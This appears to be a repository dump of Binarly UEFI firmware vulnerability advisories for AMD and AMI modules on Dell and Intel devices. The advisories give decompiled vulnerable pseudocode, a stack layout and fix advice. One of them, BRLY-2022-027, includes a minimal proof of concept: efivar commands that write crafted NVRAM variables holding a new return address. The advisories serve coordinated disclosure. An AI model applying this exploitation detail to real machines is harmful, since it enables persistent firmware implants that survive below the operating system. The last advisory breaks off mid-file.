├── .gitignore ├── AMD ├── BRLY-2021-004.md ├── BRLY-2022-042.md ├── BRLY-2022-043.md ├── BRLY-2022-044.md ├── BRLY-2022-118.md └── BRLY-2022-174.md ├── AMI ├── BRLY-2021-043.md ├── BRLY-2021-045.md ├── BRLY-2022-001.md ├── BRLY-2022-003.md ├── BRLY-2022-004.md ├── BRLY-2022-009.md ├── BRLY-2022-014.md ├── BRLY-2022-015.md ├── BRLY-2022-016.md ├── BRLY-2022-027.md ├── BRLY-2022-126.md ├── BRLY-2022-173.md ├── BRLY-DVA-2023-027.md └── BRLY-DVA-2023-028.md ├── Clevo └── BRLY-2025-002.md ├── Dell ├── BRLY-2022-054.md ├── BRLY-2022-055.md ├── BRLY-2022-065.md ├── BRLY-2022-070.md ├── BRLY-2022-087.md ├── BRLY-2022-099.md ├── BRLY-2022-100.md ├── BRLY-2022-101.md ├── BRLY-2022-119.md ├── BRLY-2022-121.md ├── BRLY-2022-122.md ├── BRLY-2022-123.md ├── BRLY-2022-124.md ├── BRLY-2022-125.md ├── BRLY-2022-127.md ├── BRLY-2022-129.md ├── BRLY-2022-131.md ├── BRLY-2022-144.md ├── BRLY-2022-145.md ├── BRLY-2022-146.md ├── BRLY-2022-147.md ├── BRLY-2022-148.md ├── BRLY-2022-150.md ├── BRLY-2022-155.md ├── BRLY-2022-156.md ├── BRLY-2022-158.md ├── BRLY-2022-159.md ├── BRLY-2022-160.md ├── BRLY-2022-165.md ├── BRLY-2022-169.md ├── BRLY-DVA-2024-012.md ├── BRLY-DVA-2024-013.md ├── BRLY-DVA-2024-020.md ├── BRLY-DVA-2024-022.md └── BRLY-DVA-2024-023.md ├── EDK2 └── BRLY-2023-021.md ├── FirmwareBleed └── BRLY-2022-028.md ├── Fujitsu └── BRLY-2021-014.md ├── HP ├── BRLY-2021-003-PoC │ ├── 0138.tar.bz2 │ ├── code.asm │ ├── readme.md │ ├── rsrc │ │ └── poc_604c4ac862ab8e21d73f3df3977bd09c.gif │ └── setvars.nsh ├── BRLY-2021-003.md ├── BRLY-2021-005-PoC │ ├── dptf_options_expl.py │ ├── readme.md │ └── rsrc │ │ └── brly-2021-005.png ├── BRLY-2021-005.md ├── BRLY-2021-006.md ├── BRLY-2021-007.md ├── BRLY-2021-032.md ├── BRLY-2021-033.md ├── BRLY-2021-034.md ├── BRLY-2021-035.md ├── BRLY-2021-036.md ├── BRLY-2021-037.md ├── BRLY-2021-038.md ├── BRLY-2021-039.md ├── BRLY-2021-040.md ├── BRLY-2021-041.md ├── BRLY-2021-042.md ├── BRLY-2021-046.md ├── BRLY-2021-047.md ├── BRLY-2021-050.md ├── BRLY-2021-051.md ├── BRLY-2021-053.md ├── BRLY-2022-010.md ├── BRLY-2022-011.md ├── BRLY-2022-012.md └── BRLY-2022-013.md ├── Insyde ├── BRLY-2021-008.md ├── BRLY-2021-009.md ├── BRLY-2021-010.md ├── BRLY-2021-011.md ├── BRLY-2021-012.md ├── BRLY-2021-013.md ├── BRLY-2021-015.md ├── BRLY-2021-016.md ├── BRLY-2021-017.md ├── BRLY-2021-018.md ├── BRLY-2021-019.md ├── BRLY-2021-020.md ├── BRLY-2021-021.md ├── BRLY-2021-022.md ├── BRLY-2021-023.md ├── BRLY-2021-024.md ├── BRLY-2021-025.md ├── BRLY-2021-026.md ├── BRLY-2021-027.md ├── BRLY-2021-028.md ├── BRLY-2021-029.md ├── BRLY-2021-030.md ├── BRLY-2021-031.md ├── BRLY-2022-017.md ├── BRLY-2022-018.md ├── BRLY-2022-019.md ├── BRLY-2022-020.md ├── BRLY-2022-021.md ├── BRLY-2022-022.md ├── BRLY-2022-023.md ├── BRLY-2022-024.md ├── BRLY-2022-025.md ├── BRLY-2022-026.md ├── BRLY-DVA-2023-025.md ├── BRLY-DVA-2023-026.md ├── BRLY-DVA-2023-029.md └── rsrc │ ├── PocPkg-BRLY-2021-021 │ ├── PocPkg.dec │ ├── PocPkg.dsc │ └── Src │ │ ├── SetPrimaryDisplay.c │ │ └── SetPrimaryDisplay.inf │ ├── poc-BRLY-2021-021.png │ └── stack_state-BRLY-2021-021.png ├── Intel ├── BRLY-2022-038.md ├── BRLY-2022-039.md ├── BRLY-2022-040.md ├── BRLY-2022-041.md └── BRLY-2024-002.md ├── LICENSE ├── Lenovo ├── BRLY-2021-001.md ├── BRLY-2021-002.md ├── BRLY-2022-032.md ├── BRLY-2022-034.md ├── BRLY-2022-035.md ├── BRLY-2022-037.md ├── BRLY-2023-002.md ├── BRLY-2023-004.md ├── BRLY-2023-005.md ├── BRLY-2024-003.md └── BRLY-DVA-2023-003.md ├── Lighttpd └── BRLY-2024-004.md ├── LogoFAIL ├── BRLY-2023-006.md ├── BRLY-2023-018.md ├── BRLY-LOGOFAIL-2023-001.md ├── BRLY-LOGOFAIL-2023-002.md ├── BRLY-LOGOFAIL-2023-003.md ├── BRLY-LOGOFAIL-2023-004.md ├── BRLY-LOGOFAIL-2023-005.md ├── BRLY-LOGOFAIL-2023-006.md ├── BRLY-LOGOFAIL-2023-007.md ├── BRLY-LOGOFAIL-2023-008.md ├── BRLY-LOGOFAIL-2023-009.md ├── BRLY-LOGOFAIL-2023-010.md ├── BRLY-LOGOFAIL-2023-011.md ├── BRLY-LOGOFAIL-2023-012.md ├── BRLY-LOGOFAIL-2023-013.md ├── BRLY-LOGOFAIL-2023-014.md ├── BRLY-LOGOFAIL-2023-015.md ├── BRLY-LOGOFAIL-2023-016.md ├── BRLY-LOGOFAIL-2023-017.md ├── BRLY-LOGOFAIL-2023-018.md ├── BRLY-LOGOFAIL-2023-019.md ├── BRLY-LOGOFAIL-2023-020.md ├── BRLY-LOGOFAIL-2023-021.md ├── BRLY-LOGOFAIL-2023-022.md ├── BRLY-LOGOFAIL-2023-023.md ├── BRLY-LOGOFAIL-2023-024.md ├── BRLY-LOGOFAIL-2023-025.md ├── BRLY-LOGOFAIL-2023-026.md ├── BRLY-LOGOFAIL-2023-027.md ├── BRLY-LOGOFAIL-2023-028.md ├── BRLY-LOGOFAIL-2023-029.md └── BRLY-LOGOFAIL-2023-030.md ├── PKfail └── BRLY-2024-005.md ├── Qualcomm ├── BRLY-2022-029.md ├── BRLY-2022-030.md ├── BRLY-2022-031.md ├── BRLY-2022-033.md ├── BRLY-2022-036.md └── BRLY-DVA-2023-024.md ├── README.md └── Supermicro ├── BRLY-2023-001.md ├── BRLY-2023-007.md ├── BRLY-2023-008.md ├── BRLY-2023-009.md ├── BRLY-2023-010.md ├── BRLY-2023-011.md ├── BRLY-2023-012.md ├── BRLY-2023-022.md ├── BRLY-2023-023.md ├── BRLY-2023-030.md ├── BRLY-2024-001.md ├── BRLY-2024-023.md └── verified-u-boot.png /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | .DS_Store 3 | -------------------------------------------------------------------------------- /AMD/BRLY-2022-118.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-118] 2 | 3 | # Memory contents leak / information disclosure vulnerability in DXE driver on Dell platform. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a memory contents leak / information disclosure vulnerability that allows a potential attacker to dump stack memory or global memory into an NVRAM variable. This in turn could help building a successful attack vector based on exploiting a memory corruption vulnerability. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-118 12 | * AMD PSIRT assigned CVE identifier: [CVE-2023-20594](https://www.amd.com/en/resources/product-security/bulletin/amd-sb-4007.html) 13 | * CVSS v3.1: 4.9 Medium AV:P/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N 14 | 15 | ## Affected Dell firmware with confirmed impact by Binarly team 16 | 17 | | Product | Firmware version | CPU | Module name | Module GUID | Module SHA256 | 18 | | --- | --- | --- | --- | --- | --- | 19 | | Inspiron 15 3525,Vostro 3525,Vostro 3425 | 0.1.3.0 | AMD | A8DAFB9B-3529-4E87-8584-ECDB6A5B78B6 | a8dafb9b-3529-4e87-8584-ecdb6a5b78b6 | 46244ee2b5fdc63a0dd05c021a6ea8c168815128fd29bb3c675e83702d5b8917 | 20 | | Inspiron 3585 3785 | 0.1.16.0 | AMD | A8DAFB9B-3529-4E87-8584-ECDB6A5B78B6 | a8dafb9b-3529-4e87-8584-ecdb6a5b78b6 | e941ec7b857c6b4581223a916375425bd306a60094f322501cc57756ad540100 | 21 | 22 | 23 | ## Potential impact 24 | 25 | An attacker with high local access can exploit this vulnerability to read the contents of stack memory or global memory. This information could help with exploitation of other vulnerabilities in DXE to elevate privileges from ring 3 or ring 0 (depends on the operating system) to a DXE driver and execute arbitrary code. Malicious code installed as a result of this exploitation could survive operating system (OS) boot process and runtime, or modify NVRAM area on the SPI flash storage (to gain persistence). Additionally, threat actors could use this vulnerability to bypass OS security mechanisms (modify privileged memory or runtime variables), influence OS boot process, and in some cases allow an attacker to hook or modify EFI Runtime services. 26 | 27 | ## Vulnerability description 28 | 29 | Let's take Inspiron 15 3525,Vostro 3525,Vostro 3425's firmware (version: 0.1.3.0, module sha256: 46244ee2b5fdc63a0dd05c021a6ea8c168815128fd29bb3c675e83702d5b8917) as an example. 30 | 31 | The following code in the module actually allows leaking memory: 32 | 33 | * a call to a `gRT->GetVariable()` offset: `0x6f4c` 34 | * a call to a `gRT->SetVariable()` offset: `0x6f91` 35 | 36 | ```c++ 37 | __int64 __fastcall sub_6EB8(__int64 a1, char a2) 38 | { 39 | __int64 v5; // [rsp+30h] [rbp-28h] BYREF 40 | __int16 v6; // [rsp+38h] [rbp-20h] 41 | int v7; // [rsp+40h] [rbp-18h] BYREF 42 | __int16 v8; // [rsp+44h] [rbp-14h] 43 | __int16 v9; // [rsp+46h] [rbp-12h] 44 | char v10; // [rsp+48h] [rbp-10h] 45 | char v11; // [rsp+49h] [rbp-Fh] 46 | char v12; // [rsp+4Ah] [rbp-Eh] 47 | char v13; // [rsp+4Bh] [rbp-Dh] 48 | char v14; // [rsp+4Ch] [rbp-Ch] 49 | char v15; // [rsp+4Dh] [rbp-Bh] 50 | char v16; // [rsp+4Eh] [rbp-Ah] 51 | char v17; // [rsp+4Fh] [rbp-9h] 52 | __int64 v18; // [rsp+60h] [rbp+8h] BYREF 53 | unsigned int v19; // [rsp+68h] [rbp+10h] BYREF 54 | 55 | v5 = 0i64; 56 | v6 = 0; 57 | v8 = -4810; 58 | v9 = 18896; 59 | v7 = 2039750349; 60 | v10 = -127; 61 | v11 = 36; 62 | v12 = -28; 63 | v13 = -61; 64 | v14 = 26; 65 | v15 = -57; 66 | v16 = 92; 67 | v17 = -44; 68 | v18 = 10i64; 69 | v19 = 6; 70 | ((void (__fastcall *)(const __int16 *, int *, unsigned int *, __int64 *, __int64 *))gRT->GetVariable)(// <= first call (we can rewrite DataSize here) 71 | L"AmdAcpiVar", 72 | &v7, 73 | &v19, 74 | &v18, 75 | &v5); 76 | v5 = a1; 77 | if ( a2 ) 78 | v6 = 1; 79 | else 80 | ++v6; 81 | return ((__int64 (__fastcall *)(const __int16 *, int *, _QWORD, __int64, __int64 *))gRT->SetVariable)( 82 | L"AmdAcpiVar", 83 | &v7, 84 | v19, 85 | v18, 86 | &v5); 87 | } 88 | 89 | ``` 90 | 91 | The `gRT->SetVariable()` service is called with the `DataSize` as an argument, which will be overwritten inside the `gRT->GetVariable()` service if the length of `AmdAcpiVar` NVRAM variable is greater than `10`. 92 | 93 | Thus, a potential attacker can dump `X - 10` bytes from the stack (or global memory) into AmdAcpiVar NVRAM variable by setting `AmdAcpiVar` NVRAM variable's size to `X > 10`. 94 | 95 | To fix this vulnerability the `DataSize` must be re-initialized with the size of `AmdAcpiVar` before calling `gRT->SetVariable()`. 96 | 97 | ## Disclosure timeline 98 | 99 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 100 | 101 | | Disclosure Activity | Date (YYYY-mm-dd) | 102 | | --- | --- | 103 | | Dell PSIRT is notified | 2022-12-29 | 104 | | AMD PSIRT assigned CVE number | 2023-06-06 | 105 | | AMD PSIRT provide patch release | 2023-09-20 | 106 | | BINARLY public disclosure date | 2023-09-21 | 107 | 108 | ## Acknowledgements 109 | 110 | **BINARLY efiXplorer team** 111 | -------------------------------------------------------------------------------- /AMD/BRLY-2022-174.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-174] 2 | 3 | # Memory contents leak / information disclosure vulnerability in DXE driver on Dell platform. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a memory contents leak / information disclosure vulnerability that allows a potential attacker to dump stack memory or global memory into an NVRAM variable. This in turn could help building a successful attack vector based on exploiting a memory corruption vulnerability. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-174 12 | * AMD PSIRT assigned CVE identifier: [CVE-2023-20597](https://www.amd.com/en/resources/product-security/bulletin/amd-sb-4007.html) 13 | * CVSS v3.1: 6.0 Medium AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N 14 | 15 | ## Affected Dell firmware with confirmed impact by Binarly team 16 | 17 | | Product | Firmware version | CPU | Module name | Module GUID | Module SHA256 | 18 | | --- | --- | --- | --- | --- | --- | 19 | | Inspiron 15 3525,Vostro 3525,Vostro 3425 | 0.1.3.0 | AMD | AmdCcxZen3CznDxe | 56aa1233-7407-4058-9e17-88de138ea15d | fd8ddad069d3583eef335a4deed2906bf3b24fce19a7c8d51dc1606b326b5411 | 20 | 21 | 22 | ## Potential impact 23 | 24 | An attacker with high local access can exploit this vulnerability to read the contents of stack memory or global memory. This information could help with exploitation of other vulnerabilities in DXE to elevate privileges from ring 3 or ring 0 (depends on the operating system) to a DXE driver and execute arbitrary code. Malicious code installed as a result of this exploitation could survive operating system (OS) boot process and runtime, or modify NVRAM area on the SPI flash storage (to gain persistence). Additionally, threat actors could use this vulnerability to bypass OS security mechanisms (modify privileged memory or runtime variables), influence OS boot process, and in some cases allow an attacker to hook or modify EFI Runtime services. 25 | 26 | ## Vulnerability description 27 | 28 | Let's take Inspiron 15 3525,Vostro 3525,Vostro 3425's firmware (version: 0.1.3.0, module sha256: fd8ddad069d3583eef335a4deed2906bf3b24fce19a7c8d51dc1606b326b5411) as an example. 29 | 30 | The following code in the module actually allows leaking memory: 31 | 32 | * a call to a `gRT->GetVariable()` offset: `0x2827` 33 | * a call to a `gRT->SetVariable()` offset: `0x285f` 34 | 35 | ```c++ 36 | void sub_27C0() 37 | { 38 | int v0; // eax 39 | __int64 v1; // rax 40 | int v2[4]; // [rsp+30h] [rbp-10h] BYREF 41 | char v3; // [rsp+50h] [rbp+10h] BYREF 42 | char v4; // [rsp+58h] [rbp+18h] BYREF 43 | __int64 v5; // [rsp+60h] [rbp+20h] BYREF 44 | 45 | sub_4C6C(1024i64, " CcxCheckDownCoreStatus Entry\n"); 46 | v2[0] = 41014; 47 | v0 = sub_5974(v2); 48 | v3 = 0; 49 | v5 = 1i64; 50 | v4 = v0 == 0; 51 | v1 = (gRT->GetVariable)( // <= first call (we can rewrite DataSize here) 52 | L"DownCoreStatus", 53 | &VendorGuid, 54 | 0i64, 55 | &v5, 56 | &v3); 57 | if ( v4 != v3 || v1 ) 58 | { 59 | (gRT->SetVariable)( // <= second call 60 | L"DownCoreStatus", 61 | &VendorGuid, 62 | 7i64, 63 | v5, 64 | &v4); 65 | if ( v3 && !v4 ) 66 | { 67 | sub_4C6C(1024i64, aDowncoredAutoI); 68 | (gRT->ResetSystem)(0i64, 0i64, 0i64, 0i64); 69 | } 70 | } 71 | sub_4C6C(1024i64, aCcxcheckdownco_0); 72 | } 73 | 74 | ``` 75 | 76 | The `gRT->SetVariable()` service is called with the `DataSize` as an argument, which will be overwritten inside the `gRT->GetVariable()` service if the length of `DownCoreStatus` NVRAM variable is greater than `1`. 77 | 78 | Thus, a potential attacker can dump `X - 1` bytes from the stack (or global memory) into DownCoreStatus NVRAM variable by setting `DownCoreStatus` NVRAM variable's size to `X > 1`. 79 | 80 | To fix this vulnerability the `DataSize` must be re-initialized with the size of `DownCoreStatus` before calling `gRT->SetVariable()`. 81 | 82 | ## Disclosure timeline 83 | 84 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 85 | 86 | | Disclosure Activity | Date (YYYY-mm-dd) | 87 | | --- | --- | 88 | | Dell PSIRT is notified | 2022-12-29 | 89 | | AMD PSIRT assigned CVE number | 2023-06-06 | 90 | | AMD PSIRT provide patch release | 2023-09-20 | 91 | | BINARLY public disclosure date | 2023-09-21 | 92 | 93 | ## Acknowledgements 94 | 95 | **BINARLY efiXplorer team** 96 | -------------------------------------------------------------------------------- /AMI/BRLY-2022-004.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-004] 2 | 3 | # SMM arbitrary code execution in USBRT SMM driver on Dell devices. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered SMM arbitrary code execution on Dell devices. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-004 12 | * CERT/CC assigned case number: VU#540990 13 | * Dell PSIRT assigned CVE identifier: CVE-2022-24419 14 | * CVSS v3.1 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected Intel firmware with confirmed impact by Binarly team 17 | 18 | | Device/Firmware | File Name | SHA256 (File PE32 section) | File GUID | 19 | | --- | --- | --- | --- | 20 | | DELL Edge Gateway 5000/5100 | USBRT | 217ceec06cedd1628740e578ea7fe47639e94ad463f641d1b4f22fa907d5d4e8 | 04EAAAA1-29A1-11D7-8838-00500473D4EB | 21 | | DELL Edge Gateway 3000 | USBRT | 217ceec06cedd1628740e578ea7fe47639e94ad463f641d1b4f22fa907d5d4e8 | 04EAAAA1-29A1-11D7-8838-00500473D4EB | 22 | 23 | ## Potential impact 24 | 25 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into BIOS. Such a malicious firmware code in BIOS could persist across operating system re-installs. Additionally, this vulnerability potentially could be used by malicious actors to bypass security mechanisms provided by UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 26 | 27 | ## Vulnerability description 28 | 29 | The vulnerability exists in SW SMI handler located at offset `0x1C00` in the driver. 30 | The handler is registered as follows: 31 | 32 | The pseudocode of the vulnerable handler is shown below: 33 | 34 | ```c++ 35 | MACRO_EFI SwSmiHandler() 36 | { 37 | unsigned __int8 *Struct; 38 | 39 | Struct = *(gUsbData + 22080); 40 | if ( Struct ) 41 | *(gUsbData + 22080) = 0; 42 | else 43 | Struct = *(16 * MEMORY[0x40E] + 0x104); 44 | if ( !Struct ) 45 | return EFI_OUT_OF_RESOURCES; 46 | CallApiFunction(Struct); 47 | return 0; 48 | } 49 | 50 | void __fastcall CallApiFunction(unsigned __int8 *Struct) 51 | { 52 | unsigned __int8 Index; 53 | 54 | if ( Struct ) 55 | { 56 | Index = *Struct; 57 | if ( *Struct ) 58 | { 59 | if ( Index < 0x20 || Index > 0x38 ) 60 | { 61 | Struct[2] = 0xF0; // Arbitrary SMRAM write 62 | return; 63 | } 64 | Index -= 31; 65 | } 66 | gUsbApiTable[Index](); 67 | } 68 | } 69 | ``` 70 | 71 | As you can see from the pseudocode, the `Struct` pointer can be controlled by an attacker, but is not checked for overlap with SMRAM. 72 | 73 | This means that a potential attacker can write `0xF0` to a controlled location in SMRAM. Such an error leads to the execution of arbitrary code in SMM. 74 | 75 | To protect against exploitation, it is necessary to check the `Struct` buffer so that it does not overlap with SMRAM. In addition, you need to check all the functions inside the `gUsbApiTable` table. 76 | 77 | ## Disclosure timeline 78 | 79 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 80 | 81 | | Disclosure Activity | Date | 82 | | ---------------------------------------- | ------------- | 83 | | Dell PSIRT is notified | 2021-12-08 | 84 | | Dell PSIRT confirmed reported issue | 2022-02-25 | 85 | | Dell PSIRT assigned CVE number | 2022-02-25 | 86 | | Dell PSIRT provide patch release | 2022-02-25 | 87 | | BINARLY public disclosure date | 2022-03-10 | 88 | 89 | ## Acknowledgements 90 | 91 | **BINARLY efiXplorer team** 92 | 93 | ## References 94 | 95 | * https://github.com/tandasat/SmmExploit 96 | -------------------------------------------------------------------------------- /AMI/BRLY-2022-015.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-015] 2 | 3 | # The arbitrary code execution in DXE driver. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered the ability of arbitrary code execution in DXE driver. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-015 12 | * Intel PSIRT assigned CVE identifier: CVE-2022-34345 13 | * AMI PSIRT assigned CVE identifier: CVE-2022-2154 14 | * CERT/CC assigned case number: VU#158026 15 | * FwHunt rule: [BRLY-2022-015](https://github.com/binarly-io/FwHunt/blob/main/rules/Vulnerabilities/AMI/BRLY-2022-015.yml) 16 | * CVSS v3.1: 7.2 High AV:P/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 17 | 18 | ## Affected Intel firmware images with confirmed impact by Binarly team 19 | 20 | | Device/Firmware | File Name | SHA256 (File PE32 section) | File GUID | 21 | | --- | --- | --- | --- | 22 | | Intel NUC M15 BCTGL357 v0072 (Latest) | AMITSE | 288769fcb374d9280735e259c579e2dc209491f4da43b085d6aabc2d6e6ee57d | b1da0adf-4f77-4070-a88e-bffe1c60529a | 23 | | Intel NUC M15 BCTGL357 v0072 (Latest) | - | 6a2e79de518eb92408ed6c21421b4119da50c2ad31ff7adbb26155c7a335c26d | a2df5376-c2ed-49c0-90ff-8b173b0fd066 | 24 | 25 | ## Potential impact 26 | 27 | An attacker with physical access can exploit this vulnerability to execute arbitrary code during DXE phase. 28 | A malicious code installed as a result of vulnerability exploitation in DXE driver could survive across an operating system (OS) boot process and runtime. 29 | 30 | ## Vulnerability description 31 | 32 | Consider the vulnerability on the example of the `AMITSE` driver (file GUID: `b1da0adf-4f77-4070-a88e-bffe1c60529a`). 33 | 34 | The pseudocode for vulnerable function is shown below (function address: `0x16520`). 35 | 36 | ```c++ 37 | __int64 sub_16520() 38 | { 39 | // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] 40 | 41 | GetPackageListHandle = gEsaVarPtr01; 42 | Arg2 = 0; 43 | Guid[0] = 0x70E1A818; 44 | Guid[1] = 0x44490BE1; 45 | Guid[2] = 0xF69ED4BF; 46 | Guid[3] = 0xA8027F8C; 47 | VendorGuid.Data1 = 0xA2DF5376; 48 | *&VendorGuid.Data2 = 0x49C0C2ED; 49 | *VendorGuid.Data4 = 0x178BFF90; 50 | *&VendorGuid.Data4[4] = 0x66D00F3B; 51 | if ( gEsaVarPtr01 52 | || (DataSize = 8, 53 | gRT->GetVariable(L"EsaVarPtr01", &VendorGuid, 0, &DataSize, &gEsaVarPtr01), 54 | (GetPackageListHandle = gEsaVarPtr01) != 0) ) 55 | { 56 | Handle = GetPackageListHandle(Guid, &Arg2); 57 | } 58 | else 59 | { 60 | Handle = -1; 61 | } 62 | if ( Handle != -1 ) 63 | return gEfiHiiDatabaseProtocol->RemovePackageList(gEfiHiiDatabaseProtocol, Handle); 64 | return Handle; 65 | } 66 | ``` 67 | 68 | As we can see from the pseudocode, the address of `GetPackageListHandle` function located in the NVRAM variable `EsaVarPtr01`. 69 | Thus, a potential attacker can create the NVRAM variable `EsaVarPtr01` and specify the address of the `GetPackageListHandle` function inside the data of the variable `EsaVarPtr01`. Thus, an attacker can execute arbitrary code during DXE phase. 70 | 71 | It should be noted that the value of the variable `EsaVarPtr01` cannot be set at runtime, but it can be set by physically modifying the SPI flash memory. 72 | 73 | ## Disclosure timeline 74 | 75 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 76 | 77 | | Disclosure Activity | Date | 78 | | ---------------------------------------- | ------------- | 79 | | Intel PSIRT is notified | 2022-05-04 | 80 | | Intel PSIRT confirmed reported issue | 2022-07-28 | 81 | | Intel PSIRT assigned CVE number | 2022-07-28 | 82 | | BINARLY public disclosure date | 2022-08-10 | 83 | 84 | ## Acknowledgements 85 | 86 | **BINARLY efiXplorer team** 87 | -------------------------------------------------------------------------------- /AMI/BRLY-2022-027.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-027] 2 | 3 | # The stack buffer overflow vulnerability leads to arbitrary code execution during PEI phase on Intel platform. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a stack buffer overflow vulnerability on Intel platforms allowing a possible attacker to execute arbitrary code during PEI phase. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-027 12 | * Intel PSIRT assigned CVE identifier: CVE-2022-28858 13 | * AMI PSIRT assigned CVE identifier: CVE-2022-26873 14 | * CERT/CC assigned case number: VU#158026 15 | * FwHunt rule: [BRLY-2022-027](https://github.com/binarly-io/FwHunt/blob/main/rules/Vulnerabilities/AMI/BRLY-2022-027.yml) 16 | * CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 17 | 18 | ## Affected Intel firmware with confirmed impact by Binarly team 19 | 20 | | Device/Firmware | File Name | SHA256 (File PE32 section) | File GUID | 21 | | --- | --- | --- | --- | 22 | | Intel NUC M15 | PlatformInitAdvancedPreMem | 644044fdb8daea30a7820e0f5f88dbf5cd460af72fbf70418e9d2e47efed8d9b | EEEE611D-F78F-4FB9-B868-55907F169280 | 23 | 24 | ## Potential impact 25 | 26 | A potential attacker can execute an arbitrary code at the time of the PEI phase and influence the subsequent boot stages. This can lead to the mitigations bypassing, physical memory contents disclosure, discovery of any secrets from any Virtual Machines (VMs) and bypassing memory isolation and confidential computing boundaries. Additionally, an attacker can build a payload which can be injected into the SMRAM memory. 27 | 28 | ## Vulnerability description 29 | 30 | The pseudocode for vulnerable function is shown below: 31 | 32 | ```c++ 33 | int __thiscall sub_FFAE2B82(void *this) 34 | { 35 | ... 36 | const EFI_PEI_SERVICES **PeiServices; 37 | char CpuSetupData[1072]; 38 | UINTN DataSize; 39 | EFI_PEI_READ_ONLY_VARIABLE2_PPI *Ppi; 40 | 41 | ... 42 | DataSize = 1072; 43 | Ppi->GetVariable(Ppi, L"SaSetup", &gSaSetupGuid, 0, &DataSize, CpuSetupData); 44 | Ppi->GetVariable(Ppi, L"CpuSetup", &gCpuSetupGuid, 0, &DataSize, CpuSetupData); 45 | ... 46 | return 0; 47 | } 48 | ``` 49 | 50 | If the value of the `SaSetup` NVRAM variable is larger than `1072` bytes, then after the first call of the `Ppi->GetVariable()` service, the `DataSize` value will be overwritten with the real size of the `SaSetup` NVRAM variable. 51 | 52 | After second call of the `Ppi->GetVariable()` service stack overflow may occur. 53 | An overflow of `24` bytes is enough to execute arbitrary code: 54 | 55 | ``` 56 | -00000440 CpuSetupData db 1072 dup(?) 57 | -00000010 var_10 db ? 58 | -0000000F db ? ; undefined 59 | -0000000E var_E dd ? 60 | -0000000A db ? ; undefined 61 | -00000009 db ? ; undefined 62 | -00000008 DataSize dd ? 63 | -00000004 Ppi dd ? ; offset 64 | +00000000 s db 4 dup(?) 65 | +00000004 r db 4 dup(?) 66 | ``` 67 | 68 | ## Minimal POC 69 | 70 | ```bash 71 | sudo efivar -w -f SaSetupData_new.bin --name 72c5e28c-7783-43a1-8767-fad73fccafa4-SaSetup 72 | sudo efivar -w -f CpuSetupData_new.bin --name b08f97ff-e6e8-4193-a997-5e9e9b0adb32-CpuSetup 73 | sudo reboot 74 | ``` 75 | 76 | The data in the file `SaSetupData_new.bin` may be as follows: 77 | 78 | | Offset | Data | 79 | | --- | --- | 80 | | 0x0 | Old data of SaSetup NVRAM variable | 81 | | 0x430 | Some data | 82 | | 0x444 | Last dword | 83 | 84 | The data in the file `CpuSetupData_new.bin` may be as follows: 85 | 86 | | Offset | Data | 87 | | --- | --- | 88 | | 0x0 | Old data of CpuSetup NVRAM variable | 89 | | 0x244 | Some data | 90 | | 0x444 | New return address | 91 | 92 | ## Disclosure timeline 93 | 94 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 95 | 96 | | Disclosure Activity | Date | 97 | | ---------------------------------------- | ------------- | 98 | | Intel PSIRT is notified | 2022-02-11 | 99 | | Intel PSIRT confirmed reported issue | 2022-03-22 | 100 | | Intel PSIRT assigned CVE number | 2022-03-22 | 101 | | Intel PSIRT provide patch release | 2022-03-22 | 102 | | BINARLY public disclosure date | 2022-08-10 | 103 | 104 | ## Acknowledgements 105 | 106 | **BINARLY efiXplorer team** 107 | -------------------------------------------------------------------------------- /AMI/BRLY-2022-173.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-173] 2 | 3 | # Memory contents leak / information disclosure vulnerability in DXE driver on Dell platform. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a memory contents leak / information disclosure vulnerability that allows a potential attacker to dump stack memory or global memory into an NVRAM variable. This in turn could help building a successful attack vector based on exploiting a memory corruption vulnerability. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-173 12 | * AMI PSIRT assigned CVE identifier: [CVE-2023-34470](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-34470) 13 | * CVSS v3.1: 6.0 Medium 